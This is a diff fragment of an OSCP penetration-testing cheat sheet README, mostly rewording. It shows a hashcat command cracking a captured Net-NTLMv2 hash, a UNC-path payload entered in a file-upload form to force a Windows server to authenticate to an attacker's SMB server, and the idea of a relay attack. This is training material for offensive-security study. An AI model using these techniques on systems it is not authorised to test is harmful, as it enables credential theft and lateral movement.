peterkhe1999/CheatSheet/OSCP/README.md

 hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force
 ```

-If we **don't have code execution**, we can also use other vectors to force an authentication.
-E.g., when we discover a **file upload** form in a web application on a Windows server, we can try to enter a non-existing file with a UNC path like `\\192.168.119.2\share\nonexistent.txt`.
+If we **don't have code execution**, use other vectors to force an authentication.
+E.g., a **file upload** form in a web application on a Windows server, try to enter a non-existing file with a UNC path like `\\192.168.119.2\share\nonexistent.txt`.
 If the web application supports uploads via **SMB**, the Windows server will authenticate to our SMB server.

 ### Relaying Net-NTLMv2
-If we have access to **FILES01** as an **unprivileged** user, => we cannot run Mimikatz to extract passwords.
+If we have access to **FILES01** as an **unprivileged** user, => cannot run Mimikatz to extract passwords.

-Using the steps from the previous section, imagine we obtained the Net-NTLMv2 hash, but couldn't crack it because it was too complex.
+We also obtained Net-NTLMv2 hash the couldn't crack it because it was too complex.

 If the user may be a **local administrator** on another machine. => try to use the hash on another machine in what is known as a **relay attack**.